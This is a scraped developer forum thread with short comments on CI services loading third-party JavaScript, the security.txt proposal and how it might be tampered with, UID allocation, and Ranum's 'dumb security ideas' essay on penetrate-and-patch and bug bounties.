                                                                        Also, Travis does not have your tokens or code in their web frontend, code is on Github, tokens should be encrypted using the encrypted environment: https://docs.travis-ci.com/user/environment-variables#Defining-encrypted-variables-in-.travis.yml

                                                                        1. 2

                                                                          You have proven my point perfectly.

                                                                          CircleCI’s only sin here is one of a lack of communication. There is nothing actually wrong with any of the callouts the article mentions, they just need to be VERY sure that their users are aware of exactly who is seeing the source code they upload. This should be an object lesson for anyone running a SaS company, ESPECIALLY if said SaS company caters to developers.

                                                                          1. 4

                                                                            This is not an apples to apples comparison, in my post I cited Javascripts only (which can make AJAX requests and extract source code), @skade cites that Travis loads fonts, images, and CSS from third party domains, which don’t have those properties; a compromise in CSS might change the appearance of a page but generally can’t result in your source code/API tokens being leaked to a third party.

                                                                            As far as I follow the only external Javascript run by Travis CI is Pusher. So, no, it has not proven your point perfectly, in fact it demonstrates the opposite.

                                                                  1. 2

                                                                    Migrating $DAYJOB’s Maven repository to use Deps, and working on the reliability and observability of the repository. Also looking to start bringing more beta users on (have the first user on already!) very soon. Hand-in-hand with that will be improving the on-boarding process.

                                                                    1. 2

                                                                      This feature looks like it will enable some nice security benefits. However I’m a little concerned about the implementation (recursive chown’s, hashing usernames to get UID’s, reusing UID’s where possible, still relatively small UID space). As I read it I got the feeling that I would see this feature described in detail at the bottom of a very long postmortem debugging story about some pathological performance issues they ran into.

                                                                      1. 6

                                                                        Seems like this would require some extra infrastructure/monitoring to make sure the security.txt itself is not tampered with. Imagine malware infecting popular webservers that rewrites email addresses to one owned by the hacker.

                                                                        It wouldn’t be too farfetched to register a fake email and domain appsec@example-security.net for a target website example.com and get free 0day security disclosures to your inbox. The separate domain is little suspicious, sure, but if security contact info were always obvious like security@example.com (primary domain) then security.txt wouldn’t be that necessary in the first place.

                                                                        What would the extra protection look like? Maybe start with PGP signing the security.txt file? But wait, the PGP file is part of the proposed contents of security.txt. The hacker could change that URL too. Hmm.

                                                                        I guess my point is, adding an important file like this is not as trivial as it sounds. It’s not merely a convenience, but also an additional point of attack. Sure, it may not be that likely for a file to be compromised in the first place, but the rewards for compromising the file would be pretty huge depending on the company/owner. So this really requires someone to pay attention to their web stack, which may be a tall order for a non-web developer trying to setup a simple info website for their non-web product, for example.

                                                                        1. 3

                                                                          I’m far from a security expert but I don’t see the need of being signed (certifying who signed it). You just need to be sure that it didn’t changed in time, and if it does, you need a way to check it’s normal. I was thinking to few ideas that might be total crap:

                                                                          • Store a strong hash of it in a DNS TXT field?
                                                                          • Store it on a blockchain? So you have an history of previous hashes.
                                                                          1. 1

                                                                            The security implications for this don’t seem to be any different from hosting a Security page in HTML on your website explaining your reporting process?

                                                                            1. 2

                                                                              I guess the differences are that security.txt is trying to be a standard, and is not visible on the website itself. If the owner doesn’t know about it, a hacker can put one there without the owner ever noticing, since it’s not visible when browsing the website. But security researchers may still use it, assuming the owner put it there.

                                                                          1. 4

                                                                            If you’re a security practitioner, teaching yourself how to hack is also part of the “Hacking is Cool” dumb idea. Think about it for a couple of minutes: teaching yourself a bunch of exploits and how to use them means you’re investing your time in learning a bunch of tools and techniques that are going to go stale as soon as everyone has patched that particular hole. It means you’ve made part of your professional skill-set dependent on “Penetrate and Patch” and you’re going to have to be part of the arms-race if you want that skill-set to remain relevant and up-to-date. Wouldn’t it be more sensible to learn how to design security systems that are hack-proof than to learn how to identify security systems that are dumb?

                                                                            I read this as “Just do it right, don’t waste time learning how it goes wrong.”

                                                                            1. 3

                                                                              Yeah I wouldn’t go all the way to the point of “Just don’t make mistakes”, but I do think there is something to be said for taking things slower and spending more time designing carefully up-front, rather than falling into the Penetrate and Patch cycle. However I’d also want to use all of the tools available at my disposal to verify the design, but they can’t replace having a secure design, nor can they (fully) make an insecure design secure.

                                                                            1. 8

                                                                              I read this yesterday, and I’ve been thinking a lot about number three “Penetrate and Patch”:

                                                                              In other words, you attack your firewall/software/website/whatever from the outside, identify a flaw in it, fix the flaw, and then go back to looking. […] In other words, the problem with “Penetrate and Patch” is not that it makes your code/implementation/system better by design, rather it merely makes it toughened by trial and error.

                                                                              It made me compare and contrast well designed systems which go years without security issues with things like Wordpress which seem to have issues quarterly (monthly?).

                                                                              On four “Hacking is Cool”

                                                                              My prediction is that the “Hacking is Cool” dumb idea will be a dead idea in the next 10 years. I’d like to fantasize that it will be replaced with its opposite idea, “Good Engineering is Cool” but so far there is no sign that’s likely to happen.

                                                                              The opposite is true (this was written in 2005), and with the rise in bug bounty programs, hacking is cooler than ever. Note, I’m not saying that bug bounties are bad, or that we shouldn’t have them, but it does make me think more about the mindset behind them, and what kinds of behaviour this encourages in developers of systems.